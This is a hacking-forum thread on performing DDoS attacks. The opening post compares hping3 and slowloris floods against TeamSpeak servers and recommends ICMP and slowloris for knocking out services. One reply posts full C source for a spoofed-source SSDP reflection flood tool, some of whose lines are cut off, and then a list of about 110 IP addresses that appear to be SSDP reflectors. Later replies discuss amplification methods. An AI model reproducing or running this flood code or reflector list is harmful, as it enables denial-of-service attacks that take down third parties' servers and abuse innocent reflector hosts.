How to Perform a DDoS Attack

[shockli]

This is being released in the VIP section because I will be using it for IT projects at uni, and will need to be able to verify the authenticity of my papers.

Introduction:
Firstly, let’s start with what a DDoS attack is. It's a Distributed Denial of Service attack. This is a lot different than a DoS attack, which is a Denial of Service attack. The main difference between these two is that a DoS attack is run with a single, usually powerful device, while a DDoS attack is run by many (sometimes very powerful) devices.

Sometimes a DoS or DDoS attack isn't the way to go. To quote the J35T3R while speaking to him on IRC, “I don't really have any powerful resources, I prefer exploits”. You can read up on this guy, there are some questions about if he really did all the attacks he claimed to, but that didn't stop him from becoming Time’s Most Influential Man on the Internet. Please if you do not have the resources to perform an attack do not even try.

Different Types of DDoS & DoS attacks:

What is the most effective for TeamSpeak:
Environment:
Each command (except the slowloris) was run on 25x Throwaway VPS’s each running a 100mbit/s line.


Targets:
TeamSpeak 3.0.11.4 servers on other throwaway VPS’s running 100mbit/s lines.

ICMP:
Program: hping3
Results: Down within seconds.

UDP:
Program: hping3
Results: Slight increase in ping, by 50ms per person.


TCP/HTTP:
Program: hping3
Results: None whatsoever to teamspeak.


SYN:
Program: hping3
Results: None whatsoever to teamspeak.


SlowLoris:
Note: This was only run from one server and not from 25 as the others.
Program: slowhttptest
Results: Extreme resource usage, but not affecting teamspeak due to teamspeak is efficient on resources.

PoD:
Program: hping3
Results: Network usage increase, but not enough to do any proper damage.


Conclusion:
The most efficient attack vector is ICMP. It seems like most servers cannot withstand this kind of attack at all. To protect your server I would recommend disabling ICMP requests if you have problems with people attacking you via ICMP.

I would also recommend using a slowloris attack for if you need to do any website DOS’ing. It is extremely efficient and uses barely any resources on the attacker's side.

Note/Edit: It seems I should not have posted the commands on how to do that. It has been added to the R4P3 forum rules, as R4P3 does not encourage attacking anyone. If you would like to know how to do this please contact me on IRC and we can discuss it further to give you access to an uncensored report.

Spoiler

Teaser: I might release a tool that can work very well soon.

Cool Websites to View:
http://map.norsecorp.com/
https://cloudflare.com/
http://shock.ml/

 

[JayJax]

What about : DNS/NTP/CharGEN/SSDP/SUDP?
and : ESSYN/WIZARD/XAMS/XACK/XSYN?
or : Dominate < for OVH?

 

[JayJax]

What if? :

/* everythings dead SSDP.  Oh hi Guys hows R4p3 doing? */

#include <time.h>
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#define MAX_PACKET_SIZE 8192
#define PHI 0x9e3779b9
static uint32_t Q[4096], c = 362436;
struct list
{
        struct sockaddr_in data;
        struct list *next;
        struct list *prev;
};
struct list *head;
volatile int tehport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in s$
void init_rand(uint32_t x)
{
        int i;
        Q[0] = x;
        Q[1] = x + PHI;
        Q[2] = x + PHI + PHI;
        for (i = 3; i < 4096; i++)
        {
        Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
        }
}
uint32_t rand_cmwc(void)
{
        uint64_t t, a = 18782LL;
        static uint32_t i = 4095;
        uint32_t x, r = 0xfffffffe;
        i = (i + 1) & 4095;
        t = a * Q[i] + c;
        c = (t >> 32);
        x = t + c;
        if (x < c) {
        x++;
        c++;
        }
        return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int nwords)
{
        unsigned long sum = 0;
        for (sum = 0; nwords > 0; nwords--)
        sum += *buf++;
        sum = (sum >> 16) + (sum & 0xffff);
        sum += (sum >> 16);
        return (unsigned short)(~sum);
}
void setup_ip_header(struct iphdr *iph)
{
        iph->ihl = 5;
        iph->version = 4;
        iph->tos = 0;
        iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 90;
        iph->id = htonl(54321);
        iph->frag_off = 0;
        iph->ttl = MAXTTL;
        iph->protocol = IPPROTO_UDP;
        iph->check = 0;
        iph->saddr = inet_addr("192.168.3.100");
}
void setup_udp_header(struct udphdr *udph)
{
        udph->source = htons(5678);
        udph->dest = htons(1900);
        udph->check = 0;
strcpy((void *)udph + sizeof(struct udphdr), "M-SEARCH * HTTP/1.1\r\nHost:239.2$
        udph->len=htons(sizeof(struct udphdr) + 90);
}
void *flood(void *par1)
{
        struct thread_data *td = (struct thread_data *)par1;
        char datagram[MAX_PACKET_SIZE];
        struct iphdr *iph = (struct iphdr *)datagram;
        struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
        struct sockaddr_in sin = td->sin;
        struct  list *list_node = td->list_node;
        int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
        if(s < 0){
        fprintf(stderr, "Could not open raw socket.\n");
        exit(-1);
        }
        init_rand(time(NULL));
        memset(datagram, 0, MAX_PACKET_SIZE);
        setup_ip_header(iph);
        setup_udp_header(udph);
        udph->source = htons(rand() % 65535 - 1026);
        iph->saddr = sin.sin_addr.s_addr;
        iph->daddr = list_node->data.sin_addr.s_addr;
        iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
        int tmp = 1;
        const int *val = &tmp;
        if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
        fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
        exit(-1);
        }
        init_rand(time(NULL));
        memset(datagram, 0, MAX_PACKET_SIZE);
        setup_ip_header(iph);
        setup_udp_header(udph);
        udph->source = htons(rand() % 65535 - 1026);
        iph->saddr = sin.sin_addr.s_addr;
        iph->daddr = list_node->data.sin_addr.s_addr;
        iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
        int tmp = 1;
        const int *val = &tmp;
        if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
        fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
        exit(-1);
        }
        init_rand(time(NULL));
        register unsigned int i;
        i = 0;
        while(1){
                sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_$
                list_node = list_node->next;
                iph->daddr = list_node->data.sin_addr.s_addr;
                iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
                iph->check = csum ((unsigned short *) datagram, iph->tot_len >>$

                pps++;
                if(i >= limiter)
                {
                        i = 0;
                        usleep(sleeptime);
                }
                i++;
        }
}
int main(int argc, char *argv[ ])
{
        if(argc < 6){
        fprintf(stderr, "Invalid parameters!\n");
        fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> $
                exit(-1);
        }
        srand(time(NULL));
        int i = 0;
        head = NULL;
        fprintf(stdout, "Setting up sockets...\n");
        int max_len = 128;
        char *buffer = (char *) malloc(max_len);
        buffer = memset(buffer, 0x00, max_len);
        int num_threads = atoi(argv[4]);
        int maxpps = atoi(argv[5]);
        limiter = 0;
        pps = 0;
        int multiplier = 20;
        FILE *list_fd = fopen(argv[3],  "r");
        while (fgets(buffer, max_len, list_fd) != NULL) {
                if ((buffer[strlen(buffer) - 1] == '\n') ||
                                (buffer[strlen(buffer) - 1] == '\r')) {
                        buffer[strlen(buffer) - 1] = 0x00;
                        if(head == NULL)
                        {
                                head = (struct list *)malloc(sizeof(struct list$
                                bzero(&head->data, sizeof(head->data));
                                head->data.sin_addr.s_addr=inet_addr(buffer);
                                head->next = head;
                                head->prev = head;
                        } else {
                                struct list *new_node = (struct list *)malloc(s$
                                memset(new_node, 0x00, sizeof(struct list));
                                new_node->data.sin_addr.s_addr=inet_addr(buffer$
                                new_node->prev = head;
                                new_node->next = head->next;
                                head->next = new_node;
                        }
                        i++;
                } else {
                        continue;
                }
        }
        struct list *current = head->next;
        pthread_t thread[num_threads];
        struct sockaddr_in sin;
        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = inet_addr(argv[1]);
        struct thread_data td[num_threads];
        for(i = 0;i<num_threads;i++){
                td[i].thread_id = i;
                td[i].sin= sin;
                td[i].list_node = current;
                pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
        }
        fprintf(stdout, "Starting flood...\n");
        for(i = 0;i<(atoi(argv[6])*multiplier);i++)
        {
                usleep((1000/multiplier)*1000);
                if((pps*multiplier) > maxpps)
                {
                        if(1 > limiter)
                        {
                                sleeptime+=100;
                        } else {
                                limiter--;
                        }
                } else {
                        limiter++;
                        if(sleeptime > 25)
                        {
                                sleeptime-=25;
                        } else {
                                sleeptime = 0;
                        }
                }
                pps = 0;
        }
        return 0;
}

 

[JayJax]

what will this do? :

200.108.95.100
200.74.230.162
200.85.240.71
200.74.230.163
200.25.235.250
200.51.215.54
200.222.39.174
200.77.226.85
200.59.178.11
200.108.79.254
200.126.86.215
200.108.94.198
200.108.95.128
200.108.95.80
200.108.95.86
200.12.200.201
200.38.122.136
200.25.236.21
200.108.95.66
200.47.183.236
200.74.230.239
200.12.200.122
200.12.200.207
200.106.0.25
200.106.0.6
200.201.177.82
200.108.95.240
200.74.230.209
200.108.95.95
200.59.246.234
200.74.230.241
200.108.94.176
200.74.230.178
200.108.79.242
200.108.95.183
200.46.48.94
200.12.207.150
200.12.200.135
200.74.230.195
200.55.166.141
200.108.95.185
200.38.122.134
200.51.215.230
200.74.230.223
200.53.115.65
200.74.230.180
200.108.95.162
200.12.207.157
200.12.207.106
200.48.51.102
200.12.201.42
200.218.170.13
200.95.42.239
200.108.95.207
200.181.196.172
200.74.230.184
200.55.186.1
200.130.45.44
200.108.95.101
200.52.67.91
200.37.130.10
200.235.172.139
200.74.230.249
200.108.95.245
200.108.95.242
200.48.51.111
200.130.45.0
200.59.247.123
200.74.230.175
200.74.230.224
200.74.230.203
200.217.4.109
200.47.180.9
200.47.180.9
200.53.115.35
200.74.230.198
200.51.215.105
200.74.230.212
200.74.230.166
200.76.96.113
200.12.207.107
200.12.207.220
200.47.180.7
200.203.217.187
200.51.215.36
200.74.235.248
200.121.204.137
200.12.201.52
200.108.95.143
200.108.95.165
200.12.200.252
200.55.166.183
200.112.194.123
200.108.95.114
200.47.183.183
200.55.166.144
200.217.214.142
200.108.95.144
200.108.95.113
200.108.95.111
200.52.67.94
200.38.122.54
200.74.230.185
200.74.230.204
200.12.200.129
200.12.207.158
200.72.242.24
200.12.200.109
200.8.89.56
200.47.180.3
200.121.204.30
200.38.97.174
200.75.14.72
200.12.200.120

 

[Haxxthe]

@JayJax
DNS/NTP/CharGEN/SSDP = Blocked by port / payload
ESSYN/WIZARD/XAMS/XACK/XSYN? = People that know what are they doing, know how to block this. Essentially blocking all ports / protocols, except services that they use.
Dominate < for OVH? = Old as fuck

 

[JayJax]

@JayJax
DNS/NTP/CharGEN/SSDP = Blocked by port / payload
ESSYN/WIZARD/XAMS/XACK/XSYN? = People that know what are they doing, know how to block this. Essentially blocking all ports / protocols, except services that they use.
Dominate < for OVH? = Old as fuck

How about SFTP?

 

[shockli]

How about SFTP?

SFTP is not related to teamspeak. I doubt anyone that is smart enough will be running an ftp server on their teamspeak server.

 

[ehthe]

I doubt anyone that is smart enough will be running an ftp server on their teamspeak server.

Oh boy. Don't underestimate people xD

 

[Haxxthe]

SFTP is not related to teamspeak. I doubt anyone that is smart enough will be running an ftp server on their teamspeak server.

What about reflection attacks? It works with any short packet that send backs other larger packet.

 

[Qraktzyl]

SFTP is not related to teamspeak. I doubt anyone that is smart enough will be running an ftp server on their teamspeak server.

sFTP works on SSH port (22). Just want to remove the confusion, you shouldn't be using FTP anymore if you're on a linux box and need to transfer files...

Spoiler: sFTP not FTP

"
FTP, or "File Transfer Protocol" is a popular method of transferring files between two remote systems.

SFTP, which stands for SSH File Transfer Protocol, or Secure File Transfer Protocol, is a separate protocol packaged with SSH that works in a similar way over a secure connection. The advantage is the ability to leverage a secure connection to transfer files and traverse the filesystem on both the local and remote system."

 

[shockli]

sFTP works on SSH port (22). Just want to remove the confusion, you shouldn't be using FTP anymore if you're on a linux box and need to transfer files...

Spoiler: sFTP not FTP

"
FTP, or "File Transfer Protocol" is a popular method of transferring files between two remote systems.

SFTP, which stands for SSH File Transfer Protocol, or Secure File Transfer Protocol, is a separate protocol packaged with SSH that works in a similar way over a secure connection. The advantage is the ability to leverage a secure connection to transfer files and traverse the filesystem on both the local and remote system."

Oh yes I forgot that. SCP is also always the way to go with transferring files.